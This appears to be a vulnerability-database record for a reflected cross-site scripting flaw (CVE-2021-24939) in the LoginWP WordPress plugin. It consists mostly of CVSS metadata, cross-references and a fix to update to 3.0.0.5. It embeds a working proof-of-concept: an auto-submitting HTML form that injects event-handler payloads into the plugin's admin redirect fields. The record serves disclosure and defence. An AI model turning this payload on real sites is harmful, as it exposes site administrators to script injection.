LoginWP < 3.0.0.5 - Reflected Cross-Site Scripting

2021-11-08T00:00:00

Description

The plugin does not sanitise and escape the rul_login_url and rul_logout_url parameter before outputting them back in attributes in an admin page, leading to a Reflected Cross-Site Scripting issue

{"id": "WPEX-ID:1A46CFEC-24AD-4619-8579-F09BBD8EE748", "vendorId": null, "type": "wpexploit", "bulletinFamily": "exploit", "title": "LoginWP < 3.0.0.5 - Reflected Cross-Site Scripting", "description": "The plugin does not sanitise and escape the rul_login_url and rul_logout_url parameter before outputting them back in attributes in an admin page, leading to a Reflected Cross-Site Scripting issue\n", "published": "2021-11-08T00:00:00", "modified": "2021-11-08T07:42:09", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:N"}, "cvss2": {"acInsufInfo": false, "cvssV2": {"accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "NONE", "baseScore": 4.3, "confidentialityImpact": "NONE", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N", "version": "2.0"}, "exploitabilityScore": 8.6, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "MEDIUM", "userInteractionRequired": true}, "cvss3": {"cvssV3": {"attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 6.1, "baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "privilegesRequired": "NONE", "scope": "CHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N", "version": "3.1"}, "exploitabilityScore": 2.8, "impactScore": 2.7}, "href": "", "reporter": "JrXnm", "references": [], "cvelist": ["CVE-2021-24939"], "immutableFields": [], "lastseen": "2022-01-17T19:25:27", "viewCount": 65, "enchantments": {"dependencies": {"references": [{"type": "cve", "idList": ["CVE-2021-24939"]}, {"type": "patchstack", "idList": ["PATCHSTACK:F492B24FE05DEE1497854B03B608F368"]}, {"type": "wpvulndb", "idList": ["WPVDB-ID:1A46CFEC-24AD-4619-8579-F09BBD8EE748"]}]}, "score": {"value": 5.9, "vector": "NONE"}, "backreferences": {"references": [{"type": "cve", "idList": ["CVE-2021-24939"]}, {"type": "wpvulndb", "idList": ["WPVDB-ID:1A46CFEC-24AD-4619-8579-F09BBD8EE748"]}]}, "exploitation": null, "epss": [{"cve": "CVE-2021-24939", "epss": "0.000820000", "percentile": "0.333600000", "modified": "2023-03-18"}], "vulnersScore": 5.9}, "sourceData": "<html>\r\n <body>\r\n <form action=\"https://example.com/wp-admin/admin.php?page=loginwp-redirections&new=1\" id=\"hack\" method=\"POST\">\r\n <input type=\"hidden\" name=\"rul_login_url\" value='\" style=animation-name:rotation onanimationstart=alert(/XSS-login_url/)//' />\r\n <input type=\"hidden\" name=\"rul_logout_url\" value='\" style=animation-name:rotation onanimationstart=alert(/XSS-logout_url/)//' />\r\n <input type=\"submit\" value=\"Submit request\" />\r\n </form>\r\n </body>\r\n <script>\r\n var form1 = document.getElementById('hack');\r\n form1.submit();\r\n</script>\r\n</html>", "generation": 0, "_state": {"dependencies": 1660004461, "score": 1698843920, "epss": 1679159933}, "_internal": {"score_hash": "ed353614f9b82768cd4eb15b4302fc7f"}}

{"cve": [{"lastseen": "2023-11-27T14:38:59", "description": "The LoginWP (Formerly Peter's Login Redirect) WordPress plugin before 3.0.0.5 does not sanitise and escape the rul_login_url and rul_logout_url parameter before outputting them back in attributes in an admin page, leading to a Reflected Cross-Site Scripting issue", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "LOW", "privilegesRequired": "NONE", "baseScore": 6.1, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 2.7}, "published": "2021-12-06T16:15:00", "type": "cve", "title": "CVE-2021-24939", "cwe": ["CWE-79"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "NONE", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 4.3, "vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-24939"], "modified": "2021-12-06T21:27:00", "cpe": [], "id": "CVE-2021-24939", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2021-24939", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:N"}, "cpe23": []}], "patchstack": [{"lastseen": "2022-06-01T19:28:50", "description": "Reflected Cross-Site Scripting (XSS) vulnerability discovered by JrXnm in WordPress LoginWP plugin (versions <= 3.0.0.4).\n\n## Solution\n\n\r\n Update the WordPress LoginWP plugin to the latest available version (at least 3.0.0.5).\r\n ", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "LOW", "privilegesRequired": "NONE", "baseScore": 6.1, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 2.7}, "published": "2021-11-08T00:00:00", "type": "patchstack", "title": "WordPress LoginWP plugin <= 3.0.0.4 - Reflected Cross-Site Scripting (XSS) vulnerability", "bulletinFamily": "software", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "NONE", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 4.3, "vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-24939"], "modified": "2021-11-08T00:00:00", "id": "PATCHSTACK:F492B24FE05DEE1497854B03B608F368", "href": "https://patchstack.com/database/vulnerability/peters-login-redirect/wordpress-loginwp-plugin-3-0-0-4-reflected-cross-site-scripting-xss-vulnerability", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:N"}}], "prion": [{"lastseen": "2023-11-22T00:40:57", "description": "The LoginWP (Formerly Peter's Login Redirect) WordPress plugin before 3.0.0.5 does not sanitise and escape the rul_login_url and rul_logout_url parameter before outputting them back in attributes in an admin page, leading to a Reflected Cross-Site Scripting issue", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "LOW", "privilegesRequired": "NONE", "baseScore": 6.1, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 2.7}, "published": "2021-12-06T16:15:00", "type": "prion", "title": "Cross site scripting", "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "NONE", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 4.3, "vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-24939"], "modified": "2021-12-06T21:27:00", "id": "PRION:CVE-2021-24939", "href": "https://www.prio-n.com/kb/vulnerability/CVE-2021-24939", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:N"}}], "cnvd": [{"lastseen": "2022-11-05T07:59:22", "description": "WordPress is the WordPress Foundation's suite of blogging platforms developed using the PHP language. The platform supports the hosting of personal blogging sites on servers with PHP and MySQL. WordPress LoginWP plugin has a cross-site scripting vulnerability in versions prior to 3.0.0.5, which stems from a lack of data validation filtering of user-supplied data and output. An attacker could exploit the vulnerability to execute JavaScript code on the client side.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "LOW", "privilegesRequired": "NONE", "baseScore": 6.1, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 2.7}, "published": "2021-12-09T00:00:00", "type": "cnvd", "title": "WordPress LoginWP plugin cross-site scripting vulnerability", "bulletinFamily": "cnvd", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "NONE", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 4.3, "vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-24939"], "modified": "2021-12-10T00:00:00", "id": "CNVD-2021-95951", "href": "https://www.cnvd.org.cn/flaw/show/CNVD-2021-95951", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:N"}}], "wpvulndb": [{"lastseen": "2022-01-17T19:25:27", "description": "The plugin does not sanitise and escape the rul_login_url and rul_logout_url parameter before outputting them back in attributes in an admin page, leading to a Reflected Cross-Site Scripting issue\n\n### PoC\n", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "LOW", "baseScore": 6.1, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N", "userInteraction": "REQUIRED", "version": "3.1"}, "impactScore": 2.7}, "published": "2021-11-08T00:00:00", "type": "wpvulndb", "title": "LoginWP < 3.0.0.5 - Reflected Cross-Site Scripting", "bulletinFamily": "software", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "NONE", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 4.3, "vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-24939"], "modified": "2021-11-08T07:42:09", "id": "WPVDB-ID:1A46CFEC-24AD-4619-8579-F09BBD8EE748", "href": "https://wpscan.com/vulnerability/1a46cfec-24ad-4619-8579-f09bbd8ee748", "sourceData": "", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:N"}}]}

LoginWP &lt; 3.0.0.5 - Reflected Cross-Site Scripting

Description

Related

LoginWP < 3.0.0.5 - Reflected Cross-Site Scripting